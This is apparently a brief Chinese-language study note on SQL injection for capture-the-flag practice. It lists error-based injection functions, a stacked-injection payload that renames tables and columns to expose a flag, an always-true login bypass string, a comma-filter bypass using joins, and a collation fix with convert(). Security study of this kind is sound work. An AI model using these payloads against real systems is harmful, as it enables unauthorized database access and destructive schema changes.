报错注入
extractvalue()
updatexml()
exp()
floor()
二次注入
(待补充)
堆叠注入
(禁用select|update|delete|drop|insert|where)多个语句同时执行
如:
1';show databases;
将words表名改为words1,1919810931114514表名改为words,将现在的words表中的flag列名改为id 然后用1’ or 1=1 #得到flag
1';rename tables words to words1;rename tables `1919810931114514` to words; alter table words change flag id varchar(100);#
之后利用 1' or '1'='1 爆出flag
问题
逗号被过滤
如:
select 1,2 回显select 1
可通过 select * from (select 1)a join (select 2)b
进行绕过
数据库本身编码问题
报错:
Illegal mix of collations for operation 'UNION’
可以用convert()进行编码转换
如:group_concat(convert(TABLE_NAME using gbk))
